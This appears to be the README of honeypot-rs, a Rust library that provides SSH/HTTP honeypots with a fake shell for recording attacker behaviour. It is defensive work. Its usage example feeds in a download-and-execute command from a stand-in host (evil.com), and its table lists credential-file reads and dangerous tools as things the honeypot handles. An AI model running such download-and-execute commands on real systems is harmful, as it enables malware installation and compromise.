Lightweight SSH/HTTP honeypots with a fake shell in Rust. Capture attacker behavior with zero risk to real systems.
The core of honeypot-rs is a deterministic fake shell that responds to 40+ common reconnaissance commands instantly — no AI, no LLM, no latency.
use honeypot_rs::fake_shell::FakeShell;
let shell = FakeShell::new("prod-web-03", "root");
assert_eq!(shell.execute("whoami"), Some("root".into()));
assert_eq!(shell.execute("hostname"), Some("prod-web-03".into()));
// Attackers see realistic output
let ps = shell.execute("ps aux").unwrap();
assert!(ps.contains("sshd"));
assert!(ps.contains("nginx"));
// Dangerous commands silently "succeed" (nothing happens)
shell.execute("wget http://evil.com/malware -O /tmp/x");
shell.execute("chmod +x /tmp/x && /tmp/x");
// Unknown commands get realistic error
let resp = shell.execute("nmap 10.0.0.0/24").unwrap();
assert!(resp.contains("command not found"));| Category | Commands |
|---|---|
| Identity | whoami, id, hostname, uname -a, uptime, w |
| System | cat /etc/os-release, cat /etc/passwd, free -h, df -h |
| Network | ifconfig, ip addr, netstat -tlnp, ss -tlnp |
| Process | ps aux, ps -ef |
| Filesystem | ls, ls -la, pwd, cat /etc/shadow (denied) |
| Security | iptables -L, crontab -l, env, which curl/wget/python |
| Passthrough | echo *, cd *, exit |
| Dangerous | rm, wget, curl, chmod, chown (silent no-op) |
[dependencies]
honeypot-rs = { git = "https://github.com/InnerWarden/honeypot-rs" }Part of the InnerWarden security ecosystem.